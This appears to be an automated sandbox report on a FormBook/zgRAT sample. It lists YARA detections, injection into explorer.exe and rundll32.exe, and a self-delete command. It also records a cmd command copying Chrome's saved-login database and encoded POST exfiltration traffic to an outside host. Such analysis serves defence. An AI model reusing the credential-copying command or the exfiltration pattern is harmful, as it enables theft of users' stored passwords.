                                                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port   Process
                                                                                                          8            192.168.2.4   49823         198.44.241.20    80                 C:\Windows\explorer.exe
                                                                                                          Timestamp                             kBytes transferred   Direction   Data
                                                                                                          Jun 3, 2022 08:17:48.809731960 CEST   10586                OUT         POST /umat/ HTTP/1.1
                                                                                                          Host: www.huiyi-sui.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.huiyi-sui.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.huiyi-sui.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate


                                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port   Process
                                                                                                          9            192.168.2.4   49824         198.44.241.20    80                 C:\Windows\explorer.exe
                                                                                                          Timestamp                             kBytes transferred   Direction   Data
                                                                                                          Jun 3, 2022 08:17:49.017874002 CEST   10594                OUT         POST /umat/ HTTP/1.1
                                                                                                          Host: www.huiyi-sui.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.huiyi-sui.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.huiyi-sui.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
ZEJB-w1ymbxSnILNhlp6oTEUtklwDitGU9hKTRLUHmjKu39L7~WqXmxiA3Z4wEtGtfNzla6YGE3gWE0KNtGqD7tdmJVxA9PN66I7m1vO3ckqoogFWLNbrGiPzk6p92YiU6M1M9ZekqTj6Ft0BH7lAPW5w5CmWjPxipeb1pNSv9Q(7KUXTj_TCk-iKFKzRzbqV5U427d6f7_mWVl6CJivy3ahHdRtMbZrrdS81muL6sklq~h7vUombCYc_2yByGiEd5rQ275eqZbk4iWz8NENj2XOmlCh-Nip3YotfQaJCkfjg2DQHv5hxCInBMYrp5fxQeTqBEvqwJtj8to8AYjAWSlGhTKzq88AtgM3TaCAUyl5fbp98FO3HyZWwRrJtdLZxeU1MmpEhCQt9EraFovESyjUScT1DUlN2EMnlwaw_TInlbKDbXuDftDNbvt3DEjox8NPxFxSfJusrsQx0abUejD~2LRYVWW1xnLrCbrM67jyuGfD7V1le(H29uLQWBYra9iCAqiMe09hy1OfTEVCrEEzM1yyP39L_tnGPEvmeIi8ITj~2qsaYYSGPtzISOQIqABM3zWoulmBNvRygsyI4mEoOpbpqyN334VZEpr~vP3AllXz5ITOP9DySvcIQB4RiBifMrEqJKSyWVwtrMJZ_2Vlq8RmGySsReOmpEK4cImhwWkCYyYzX0cYuctY0r1f0aJNoZ1elRVWBy9Rkxzk8SM1RbGV23W12DmeB6DkVsqsJamWKPebDKXk5RdHYhSqWnKj53VoJdi24x_GOX39dMB3irZG1ZHI-gK5McDip383geP3tJYTSOE73kAu8wf(3TAcPySw6tXcWG9jY(Vx1bz9Va1t_rP7Hg-EWvQBZ4jZsOIdYorgNRJYHKGm5XmszHrCkuIaYPKeF~Q52oHrMsj~gGdL7KkR0Z3t8yqsWoAaQ1sxbcHA4bPas~0nNrF5NVD~2QPAbq0VkVPD6xXbbRqEFMwf-M5DgOmqoIIxaLMefWM(AQsehkh3d5gxJE3CrVRTZEbat3xnj31BIOX4AxiIxuz6SUjez~lJHnsFFTe65psWbbuclaUMVbT29hp1mkqrqx08scHGI5J2ePre4MQX42ZreKG6lANaZCZp_8SQXCdNuvtw4AGwN0LOSBb85NYSIoh(bN6uswzNGEh0dwRFSiI75z0Ihn-7UPmTQGxmpOD82C5NfVKRzyXsVgWST6T9OvQ2hfBNHB-PS4rBSb4qKxTxysaLNzJOf3GkZ2sBOgFHHj4I0KZWTpENSMB(45odvz9bFLIibfrsAwhxFYMyQmFrQJvgLRqD7dkcmMUdVgpyws6gNw1krRVLrafyzi9aNchNtr8DCokgEN4JRxqhkZgyV1-zRtlOVnkK8TvAOOykwOB~X~xG1FOx7Z3ln49wPm3kqg3P5NIOjl85k5ZVS~Eme1DzRFUOTGlAS8HLUyn3koA9w2L88Ebjlhj8lfD1frg7ilsFmnqT7JgL-KGM6C-VEGFbkFhPhhPWIV1SjTeefqIfH802-L82He5gPo1Hdp_RjvXENaBlaOSVMkn4wS0Ib4JzoSP2olniDj7mg2SxrqJVDrMr60Yo8xi2Y8dAVUAer8DyJldpmdx4OQLaANk9OTjCSPA9AHGe26G~axuK2rClHn32BBZMlcXnNoMWN1lhuBMnYjD(fES7ESm(AbnZDnA77GMFjDJSxGMlQtMiAXVpBAInqbLyovn8s0Cf7um76~rbvJOgHqnaavaZE0KLIKSXig1OYjFuEDcDLSyWKaVkN8u8KIwZvoJuwiy(br6dwWrYutatseTiWQ1nyNLZjNqPnrpuU(yC_VjDwTSv_B7JvdGds(zI2Me1_4_JFVKY3MdVfT33-YhlER861BsHuNiRQBuWe5-IKgC1q~7PSeMZRoEIo5VS3vksz1ijai9KiXjuuMGbZML4_sR~j1iVCiVTkdhxet8XO5AxFzvpXDUJuUoIZX4F_LfFbu-F3xIhqeb8sNVo
boGIA1DzVJveaheJlaMTgK0b-vi8D5j88BC0Aw0z_OWOS(RgajHhFB4Yf3aQKkFBAxJo2LTSm9aTHqLNpKryufiiO~8ZncaDsaYqNmxGlsQOM(5wEf6SukaV3mfsJ5z2Ddrqiz6P3uEfTcMQypeX7rhPcudFlCcGPA15QKq2F(p08R2bOrdw1rEPN124j(SjlAk8koX2_lK3
                                                                                                          Jun 3, 2022 08:17:49.218961954 CEST 10615 OUT
                                                                                                          Jun 3, 2022 08:17:49.219019890 CEST 10620 OUT
                                                                                                          Jun 3, 2022 08:17:49.420046091 CEST 10664 OUT
                                                                                                          Jun 3, 2022 08:18:49.617053986 CEST 11191 IN HTTP/1.1 504 Gateway Time-out
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:18:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 176
                                                                                                          Connection: close
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body bgcolor="white"><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx</center></body></html>


                                                                                                          Target ID:0
                                                                                                          Start time:08:15:19
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Users\user\Desktop\TT copy.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\TT copy.exe"
                                                                                                          Imagebase:0x520000
                                                                                                          File size:661504 bytes
                                                                                                          MD5 hash:6443C909D7E8034F945F3E1DC138A046
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.287883851.0000000002983000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.294087756.0000000007160000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.287958133.00000000029A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          Target ID:3
                                                                                                          Start time:08:15:30
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Users\user\Desktop\TT copy.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\Desktop\TT copy.exe
                                                                                                          Imagebase:0x520000
                                                                                                          File size:661504 bytes
                                                                                                          MD5 hash:6443C909D7E8034F945F3E1DC138A046
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          Target ID:7
                                                                                                          Start time:08:15:37
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                          Imagebase:0x7ff6f3b00000
                                                                                                          File size:3933184 bytes
                                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:high

                                                                                                          Target ID:15
                                                                                                          Start time:08:16:03
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Imagebase:0xfc0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:high

                                                                                                          Target ID:16
                                                                                                          Start time:08:16:12
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c del "C:\Users\user\Desktop\TT copy.exe"
                                                                                                          Imagebase:0x1190000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:17
                                                                                                          Start time:08:16:13
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff647620000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:28
                                                                                                          Start time:08:17:19
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                          Imagebase:0x1190000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:29
                                                                                                          Start time:08:17:20
                                                                                                          Start date:03/06/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff647620000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:89
                                                                                                            Total number of Limit Nodes:7

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 2W(7$UUUU
                                                                                                            • API String ID: 0-573100206
                                                                                                            • Opcode ID: 906dfd8ef1e6c45c1a55f5eaaed4edac095541e7c64d19d4e89dccf9f15d680c
                                                                                                            • Instruction ID: f33af4c7fb881d50e587f177ce9d2e9dad9f795e1b16cea9568db7347ee65ac9
                                                                                                            • Opcode Fuzzy Hash: 906dfd8ef1e6c45c1a55f5eaaed4edac095541e7c64d19d4e89dccf9f15d680c
                                                                                                            • Instruction Fuzzy Hash: B1A2C575A00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB326D7319E81CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 674ab30ff185a535bcca023b06af56a47d8c791f2f84dcc9bb0266cf8c9e98a0
                                                                                                            • Instruction ID: e8bc64c2860c132d3082f3c17a38310c3d47db32c044d18184781d42e16afa3e
                                                                                                            • Opcode Fuzzy Hash: 674ab30ff185a535bcca023b06af56a47d8c791f2f84dcc9bb0266cf8c9e98a0
                                                                                                            • Instruction Fuzzy Hash: 06A14870E042498FDB45CFE9C4446EEFBB6AF89314F24F129D618AB216E7349A41CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ab509a0016b9bdb66da8e08c970691e6fba0ade16128c0c811a0f244e6e3b506
                                                                                                            • Instruction ID: 10eb34e662e04b3a03f2be997d1c4cd8d617d7b0d408876387bcbf8d4a8acad7
                                                                                                            • Opcode Fuzzy Hash: ab509a0016b9bdb66da8e08c970691e6fba0ade16128c0c811a0f244e6e3b506
                                                                                                            • Instruction Fuzzy Hash: 97812974E042498FDB45CFEAC4446EEBBF6AF88314F14F129D618AB316E7349A428F50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9b767772825597f79e93091f44533ef4302a0f3e7f943a14f16bc8bbceb25baf
                                                                                                            • Instruction ID: 528c3d4d9f0c9a8e634e34cf65ca04c7b444ac0d9156ed984ac9e290a576eae3
                                                                                                            • Opcode Fuzzy Hash: 9b767772825597f79e93091f44533ef4302a0f3e7f943a14f16bc8bbceb25baf
                                                                                                            • Instruction Fuzzy Hash: E1811974E042498FDB45CFEAC4446EEBBF6AF89314F14F029D519AB316E7349A418F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5BAF0
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00E5BB2D
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5BB6A
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5BBC3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: e50a9ba440a9b81e11fadc62f072cf2b04cb06fecd5a4a8c2300631dff78b815
                                                                                                            • Instruction ID: 515b97b1db6399c6a4af77013ce378433a09b6ebc35af96045d3c7511079b189
                                                                                                            • Opcode Fuzzy Hash: e50a9ba440a9b81e11fadc62f072cf2b04cb06fecd5a4a8c2300631dff78b815
                                                                                                            • Instruction Fuzzy Hash: B75177B09043498FDB54CFA9C588BEEBBF0BF88314F24845AE489B7250C7789944CF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5BAF0
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00E5BB2D
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5BB6A
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5BBC3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 156e0bae131f533e73f275fd0adcd86340c73afb754497c857b2c72f06bd5470
                                                                                                            • Instruction ID: e07d3120bdb519cc192b4a5889e3ec43548a8703dc525aede659c7c728e36162
                                                                                                            • Opcode Fuzzy Hash: 156e0bae131f533e73f275fd0adcd86340c73afb754497c857b2c72f06bd5470
                                                                                                            • Instruction Fuzzy Hash: 325165B09042498FDB14DFAAC588BEEBBF0BF88314F24845AE489B7354C7749844CF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E599EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: c1ba2c06bc7346598f318a48e0826bf1e9403f80baab4be13b9e68f3c2beccea
                                                                                                            • Instruction ID: 12757311f320baa7d1db34982a3f9bff37d52c0d2f3accbf44b840fcb838d7cf
                                                                                                            • Opcode Fuzzy Hash: c1ba2c06bc7346598f318a48e0826bf1e9403f80baab4be13b9e68f3c2beccea
                                                                                                            • Instruction Fuzzy Hash: 77713770A00B058FD764DF29C54179AB7F1FF88308F008A2ED89AE7A51DB35E849CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00E55639
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: de2a9a653271fe86bc6c0746541e235b3886c7558defb1580c846b0346ece47a
                                                                                                            • Instruction ID: 7a62cc46a694f529190066d1546124ef66af4e035ceac27d02abcd1b880738e2
                                                                                                            • Opcode Fuzzy Hash: de2a9a653271fe86bc6c0746541e235b3886c7558defb1580c846b0346ece47a
                                                                                                            • Instruction Fuzzy Hash: 37412471C04718CFDB24CFA9C844BDEBBB1BF88308F61856AD448AB251DBB5594ACF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 274 e54060-e55649 CreateActCtxA 277 e55652-e556ac 274->277 278 e5564b-e55651 274->278 285 e556ae-e556b1 277->285 286 e556bb-e556bf 277->286 278->277 285->286 287 e556c1-e556cd 286->287 288 e556d0 286->288 287->288 290 e556d1 288->290 290->290
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00E55639
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 291 e5c0b8-e5c0be 292 e5c0c0-e5c154 DuplicateHandle 291->292 293 e5c156-e5c15c 292->293 294 e5c15d-e5c17a 292->294 293->294
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E5C147
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            Uniqueness

